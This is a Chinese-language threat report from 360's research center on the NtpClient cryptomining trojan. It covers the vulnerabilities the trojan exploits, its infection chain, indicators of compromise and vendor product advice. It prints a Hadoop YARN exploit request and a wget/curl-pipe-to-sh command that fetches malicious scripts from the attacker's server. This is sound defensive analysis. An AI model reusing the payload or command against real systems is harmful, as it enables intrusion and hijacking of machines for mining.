报告编号:B6-2021-101302
报告来源:360高级威胁研究分析中心
报告作者:360高级威胁研究分析中心
更新日期:2021-10-13
0x01 事件简述
360安全大脑监测发现最新的NtpClient挖矿木马攻击。该木马利用Drupal、WebLogic、Confluence、MongoDB等众多流行框架漏洞进行传播,入侵机器后占用系统资源进行挖矿,严重影响主机上的正常业务运转。由于其最终投递的木马文件名为ntpclient,遂将其命名为NtpClient挖矿木马。
0x02 分析
分析样本后发现,NtpClient挖矿木马使用到了以下11种漏洞利用方式进行入侵攻击:
漏洞编号 | 漏洞名称 |
---|---|
CVE-2018-7600 | Drupal远程代码执行漏洞 |
CVE-2020-14882 | WebLogic远程代码执行漏洞 |
CVE-2019-3396 | Confluence远程代码执行漏洞 |
CVE-2019-10758 | MongoDB mongo-express远程代码执行漏洞 |
CVE-2017-11610 | Supervisord远程命令执行漏洞 |
N/A | XXL-JOB executor未授权访问漏洞 |
N/A | Hadoop Yarn REST API未授权漏洞 |
N/A | 未知,疑似2021.07.06披露的Visual Tools DVR VX16 4.2.28.0命令注入漏洞 |
CVE-2020-28870 | InoERP 0.7.2远程代码执行漏洞 |
CVE-2020-35729 | Klog Server 2.4.1命令注入漏洞 |
CVE-2019-12725 | Zeroshell操作系统命令注入漏洞 |
以Hadoop Yarn REST API未授权漏洞为例,该漏洞利用的恶意payload如下:
POST /ws/v1/cluster/apps HTTP/1.1 Host: %s:%d Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.26.0 Content-Type: application/json Content-Length: %d {"am-container-spec": {"commands": {"command": "%s"}}, "application-id": "app_id", "application-type": "YARN", "application-name": "get-shell"}
成功利用漏洞后执行恶意命令:
wget http://185.243.56.167/yarn -O- |sh;curl http://185.243.56.167/yarn |sh
该命令从C&C下拉恶意脚本yarn并执行。yarn恶意脚本首先进行了一些系统的清理工作,例如清除crontab定时任务,删除.profile、.bashrc文件中的wget、curl恶意下载任务,清理CPU占用超过55%以及其他一些可疑进程等等。
主机环境清理完毕后从C&C拉取ntpclient木马并在执行后自删除。
其余漏洞的攻击方式大同小异,均为成功利用后下载对应的恶意脚本文件并执行,脚本在清理系统环境后拉取木马文件,实现完整的入侵流程。NtpClient挖矿木马包含的恶意sh脚本列表如下:
http://185.243.56.167/drupal2 http://185.243.56.167/web http://185.243.56.167/wid http://185.243.56.167/mongo http://185.243.56.167/rpc http://185.243.56.167/job http://185.243.56.167/yarn http://185.243.56.167/dl http://185.243.56.167/zero
ntpclient木马ELF样本中除了清理/etc/ld.so.preload文件外,也会尝试清理竞品挖矿木马和一些安全软件,以确保自己能独占系统资源。
样本中包含了编译于2021.9.23号的XMRig开源矿机程序:
矿池和钱包地址分别为
pool.hashvault.pro:80
4At34d6VnRdEHZAEMuXeYFRTnneXXYheqX2PrJ8PXpi6KC1YnTXNyWXLYzRK52jWEcAtQAMpeLhw3P1AHgnBGNy22YtJtF3
根据已连接到矿池的矿工数来看,目前的感染量为151,正处于初期发展阶段。从算力趋势图推测可知,NtpClient挖矿木马从9.24号开始活跃,在9.28~9.29号间有了一次较大的增大。
0x03 IoCs:
C&C:
http://185.243.56.167/
toxj6876sr7074hykwejfs.onion
y7myrhlz4hzpmlmt.onion
MD5:
md5 | 类型 |
---|---|
8d6cbc8756ffeb3c6546660dd17b75a8 | elf |
27e307f8ce9d320be0de5f4ad011403c | elf |
33f4e3f575995b2adb2b418377eb6943 | elf |
4220847c297c628e72c7a999e664a765 | elf |
f96cde4c2ceb1a31fde866d9eae4064a | elf |
f581c2a44f48515d16e6aac842e80461 | elf |
fe4f7eb659d98b8cf241bf8e8476fbf0 | elf |
bcbbcc97a91cae59e9c05bb4378c4645 | shell |
f4cec4950cbb56ebeb35f84999581b10 | shell |
f689fc0cff0bf97a0fcf3850ed5fe9cd | shell |
31674cd832540031a64dcd11df002e1d | shell |
6ff6a2b73cf2f0f3a206bf23cada5a53 | shell |
29feb2ccf71512edc62d857056949a26 | shell |
108a87ae54ae31abc87cbfe73d87d78d | shell |
cfef804c1c9ed2f7c6e8ee69fa0c83d3 | shell |
5e9833571b5883217b1105e5460da35d | shell |
4e97bd1559b06a07b9aebcea18320f80 | shell |
b23aa750f6b02250eacc991988cb641c | shell |
8e8943cd6f96ff70b3d62f09b7636958 | shell |
矿池:
pool.hashvault.pro:80
钱包地址:
4At34d6VnRdEHZAEMuXeYFRTnneXXYheqX2PrJ8PXpi6KC1YnTXNyWXLYzRK52jWEcAtQAMpeLhw3P1AHgnBGNy22YtJtF3
文件路径:
/tmp/.a /var/tmp/.a /run/shm/a /dev/.a /dev/shm/.a /run/user/1000/ntpclient /run/user/1000/Mozz
0x04 产品侧解决方案
若想了解更多产品信息或有相关业务需求,可移步至http://360.net。
360AISA全流量威胁分析系统
针对微软本次安全更新,360AISA已基于流量侧提供对应检测能力更新,请AISA用户联系techsupport@360.cn获取更新,尽快升级检测引擎和规则,做好安全防护工作。
360安全卫士
Windows用户可通过360安全卫士实现对应补丁安装、漏洞修复、恶意软件查杀,其他平台的用户可以根据修复建议列表中的安全建议进行安全维护。
360CERT建议广大用户使用360安全卫士定期对设备进行安全检测,以做好资产自查以及防护工作。
360本地安全大脑
360本地安全大脑是将360云端安全大脑核心能力本地化部署的一套开放式全场景安全运营平台,实现安全态势、监控、分析、溯源、研判、响应、管理的智能化安全运营赋能。360本地安全大脑已支持对相关漏洞利用的检测,请及时更新网络神经元(探针)规则和本地安全大脑关联分析规则,做好防护。
360终端安全管理系统
360终端安全管理系统软件是在360安全大脑极智赋能下,以大数据、云计算等新技术为支撑,以可靠服务为保障,集防病毒与终端安全管控功能于一体的企业级安全产品。
360终端安全管理系统已支持对相关漏洞进行检测和修复,建议用户及时更新漏洞库并安装更新相关补丁。
0x05 时间线
2021-10-13 360高级威胁研究分析中心发布通告